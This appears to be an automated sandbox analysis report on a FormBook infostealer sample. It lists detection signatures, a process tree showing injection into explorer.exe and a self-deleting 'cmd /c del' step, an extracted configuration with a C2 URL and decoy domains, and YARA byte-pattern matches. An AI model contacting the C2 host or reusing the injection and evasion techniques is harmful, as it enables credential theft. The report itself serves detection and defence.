Create Interactive Tour

Windows Analysis Report
tM32bSteJD.exe

Overview

General Information

Sample Name:	tM32bSteJD.exe
Analysis ID:	563133
MD5:	fe1b3c933234d3a68d7b0722a177ba07
SHA1:	7a2c6caf667483e57b9c183935e83c435ff5efd4
SHA256:	89a5384b284e44d23891f6b22590f0194c4ac0b2b6507bb51fa678ede6d6069a
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Machine Learning detection for sample

Self deletion via cmd delete

Injects a PE file into a foreign processes

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to read the PEB

Checks if the current process is being debugged

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

tM32bSteJD.exe (PID: 6488 cmdline: "C:\Users\user\Desktop\tM32bSteJD.exe" MD5: FE1B3C933234D3A68D7B0722A177BA07)

tM32bSteJD.exe (PID: 6720 cmdline: "C:\Users\user\Desktop\tM32bSteJD.exe" MD5: FE1B3C933234D3A68D7B0722A177BA07)

explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

autofmt.exe (PID: 6784 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)

wscript.exe (PID: 7024 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cmd.exe (PID: 7052 cmdline: /c del "C:\Users\user\Desktop\tM32bSteJD.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{
  "C2 list": [
    "www.pawastreams.com/ndf8/"
  ],
  "decoy": [
    "cantobait.com",
    "theangularteam.com",
    "qq2222.xyz",
    "floridasteamclean.com",
    "daffodilhilldesigns.com",
    "mindfulagilecoaching.com",
    "xbyll.com",
    "jessicaepedro2021.net",
    "ccssv.top",
    "zenginbilgiler.com",
    "partumball.com",
    "1681890.com",
    "schippermediaproductions.com",
    "m2volleyballclub.com",
    "ooiase.com",
    "sharingtechnology.net",
    "kiminplaka.com",
    "usedgeartrader.com",
    "cosyba.com",
    "foodfriendshipandyou.com",
    "ottolimo.com",
    "growingyourlist.com",
    "therealvictoriabelieves.com",
    "juststartmessy.com",
    "giovannahuyke.biz",
    "conditionsapplied.com",
    "hypadel.com",
    "hpywk.com",
    "safepostcourier.com",
    "heshicn.net",
    "perfektdesigns.com",
    "4008238110.com",
    "29store.xyz",
    "frasins.com",
    "amrittrading.com",
    "dimaiwang.com",
    "promtgloan.com",
    "rosalvarodriguez.com",
    "yiqingdh.xyz",
    "toloache-matrix.com",
    "homevoru.com",
    "esatescort.xyz",
    "onlinedictionary.cloud",
    "smarthomesecurity.online",
    "nikisankala.com",
    "multizoneductlessminisplits.com",
    "32123.space",
    "bethesdagardensloveland.com",
    "bestpicture-toglancetoday.info",
    "mochicascafe.com",
    "moneylovepig.com",
    "envisioneyecare.net",
    "jumbul.com",
    "onbecomingalifecoach.com",
    "gubosaonline.com",
    "2636654.win",
    "ktxloo.com",
    "side-clicks.com",
    "spectrumassociation.com",
    "albatrosmed.store",
    "drsazidalsahaf.com",
    "applykpologistics.com",
    "rezzo-jazzavienne.com",
    "huachen100.net"
  ]
}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000000.337642890.0000000010007000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000000.337642890.0000000010007000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000000.337642890.0000000010007000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ad9:$sqlite3step: 68 34 1C 7B E1 0x6bec:$sqlite3step: 68 34 1C 7B E1 0x6b08:$sqlite3text: 68 38 2A 90 C5 0x6c2d:$sqlite3text: 68 38 2A 90 C5 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.375611868.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.375611868.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.375611868.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.375992338.0000000000700000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.375992338.0000000000700000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.375992338.0000000000700000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000000.296283811.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000000.296283811.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000000.296283811.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.558589620.0000000002B60000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.558589620.0000000002B60000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.558589620.0000000002B60000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.375800193.00000000006A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.375800193.00000000006A0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.375800193.00000000006A0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.298138988.0000000002200000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.298138988.0000000002200000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.298138988.0000000002200000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.558418128.00000000027A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.558418128.00000000027A0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.558418128.00000000027A0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000000.295219336.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000000.295219336.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000000.295219336.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.558751343.0000000002E10000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.558751343.0000000002E10000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.558751343.0000000002E10000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.0.tM32bSteJD.exe.400000.5.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.0.tM32bSteJD.exe.400000.5.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.0.tM32bSteJD.exe.400000.5.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
4.2.tM32bSteJD.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.tM32bSteJD.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.tM32bSteJD.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
4.0.tM32bSteJD.exe.400000.6.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.0.tM32bSteJD.exe.400000.6.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.0.tM32bSteJD.exe.400000.6.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
2.2.tM32bSteJD.exe.2200000.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.tM32bSteJD.exe.2200000.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.tM32bSteJD.exe.2200000.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
4.0.tM32bSteJD.exe.400000.4.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.0.tM32bSteJD.exe.400000.4.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.0.tM32bSteJD.exe.400000.4.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
4.0.tM32bSteJD.exe.400000.6.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.0.tM32bSteJD.exe.400000.6.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
